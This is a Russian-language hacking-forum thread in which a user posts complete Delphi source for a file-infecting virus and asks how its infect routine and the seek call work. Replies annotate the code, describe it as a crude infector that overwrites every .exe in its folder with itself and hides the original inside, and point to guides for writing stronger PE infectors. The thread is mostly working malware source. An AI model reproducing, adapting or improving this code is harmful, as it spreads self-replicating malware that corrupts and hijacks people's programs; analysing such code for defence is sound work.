Форум АНТИЧАТ - Есть исходник и пара вопросов!

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)

- - Есть исходник и пара вопросов! (https://forum.antichat.xyz/showthread.php?t=72062)

Есть исходник и пара вопросов!

Вот собственно исходник какого то вируса с форума хакер!
Хотел бы чтобы знающие люди мне обьяснили технологию внедрения программы в другую программу ну а собственно действия процедуры infect! Было бы не плохо именно с разбора по полочкам данной процедуры,в особенности интересует функция seek! За ранее большое спасибо!

Код:

program injector;



uses

  windows,sysutils,shellapi;



const virsize=44032;



var

victims:tsearchrec;

f1,f2:file;



procedure infect(victim:string);

var

  a:integer;

  Buf: array[1..virsize] of byte;

  nr,nw:longint;

begin

  try

    randomize;

    assignfile(f1,victim);

    a:=random(200);

    rename(f1,'bad'+inttostr(a)) ;

    filemode :=0;

    assignfile(f2,paramstr(0));

    reset(f2,1) ;

    seek(f2,0);

    blockread(f2,buf,virsize);

    filemode:=2 ;

    closefile(f2);

    assignfile(f1,victim);

    rewrite(f1,1);

    blockwrite(f1,buf,virsize);

    assignfile(f2,'bad'+inttostr(a));

    reset(f2,1);

    seek(f2,0);

  repeat

    BlockRead(f2, Buf,virsize, NR);

    BlockWrite(f1, Buf, NR, NW);

  until (NR = 0) or (NW <> NR);

    closefile(f1);

    closefile(f2);

    deletefile(pchar('bad'+inttostr(a)))

  except

  end;

end;



procedure go;

label 10;

var

  Buf: array[1..virsize] of byte;

  rect:trect;

  nr,nw:longint;

begin

  ////

  try

    filemode :=0;

    assignfile(f1,paramstr(0));

    reset(f1,1);

    filemode :=2;

    assignfile(f2,paramstr(0)+'.exe');

    rewrite(f2,1);

    seek(f1,virsize);

    seek(f2,0) ;

  repeat

    filemode :=0;

    BlockRead(f1, Buf,virsize, NR);

    filemode :=2;

    BlockWrite(f2, Buf, NR, NW);

    until (NR = 0) or (NW <> NR) ;

    closefile(f1);

    closefile(f2);

    ShellExecute(0,'open',pchar(paramstr(0)+ '.exe'), nil, nil, SW_Hide);

    if not deletefile(pchar(paramstr(0)+'.exe')) then

    begin

      //--

    end;

    except

  end;

   ////

end;



begin

  filemode :=0;

  assignfile(f1,paramstr(0));

  reset(f1,1);

  if filesize(f1)>virsize then go;

  closefile(f1);

  filemode :=2;

  if FindFirst('*.exe', Faanyfile, victims) = 0 then

  repeat

    if not ((victims.Name)=extractfilename(paramstr(0))) then begin

    if not ((victims.Name)=extractfilename(extractfilename(paramstr(0)))) then infect(victims.Name);

  end;

  until FindNext(victims)<>0 ;

end.

Ф-ция seek, перемещает курсор к заданной записи (binary mode)

Код:

    seek(f2,0); {  переход в начало}

    blockread(f2,buf,virsize); { считали с буфер с позиции  }

    filemode:=2 ; { режим открытия файлов (по дефолту 2)}

    closefile(f2); 

    assignfile(f1,victim);

    rewrite(f1,1); {открыли для перезаписи}

    blockwrite(f1,buf,virsize); {записали буфер}

В общем не качественный вирус-инфектор, лучше поразбирай, инфекторы, юзающие
PE формат, добавление новой секции, внедрение в PE заголовок, если не ошибаюсь
это вирус-спутник.

ОМГ мною был написан очень похожий вирус в далеком 98-м году по такому же принципу и тоже на Паскале )))

говно код... =\ хотьбы FindClose() вызвал... в конце поиска... кривые руки это делали =\\ не в обиду будет сказанно =\\\

а вообще, похоже что этот говно код тупо берёт, переписывает все EXE в текущей директории, своей копией при этом записывая "перезаписываемый" EXE в конец себя...

и при запуске получается что сначала запустится "псевдо вирус", а потом оригинальный "сдампленный" EXE... только автор не подумал на счёт иконок... а следовало бы...

кто не понял что я хотел сказать, извините)) не умею объяснять %)

Цитата:

Сообщение от ZirroCool

Хотел бы чтобы знающие люди мне обьяснили технологию внедрения программы в другую программу ну а собственно действия процедуры infect!

Здесь нет прямого ответа на твой вопрос , но ты без труда поймёшь :
http://wasm.ru/series.php?sid=4
+ советовал бы почитать думаю для начала Румянцева "Работа с файлами в Win API" ...

всем спасибо уже сам весь исходник прокопал!!! Тему можно закрыть! Кому интересно http://www.kiber-zona.org/index.php?showtopic=2917

мдааааа, x0man... прав был Крыс Касперски, когда говорил, что вирусы пишут все кому не лень! "/
ТС, для того, чтобы написать вирус, тебе необходимы знания PE-формата, ассемблера, техник поли/метаморфизма, антиотладки, смешивания,обфускации

прочти хотя бы серию "от зеленого к красному"

http://wasm.ru/publist.php?list=6
И вот сам труЪ инфектор
http://wasm.ru/article.php?article=peinfector

Ого..прикольно..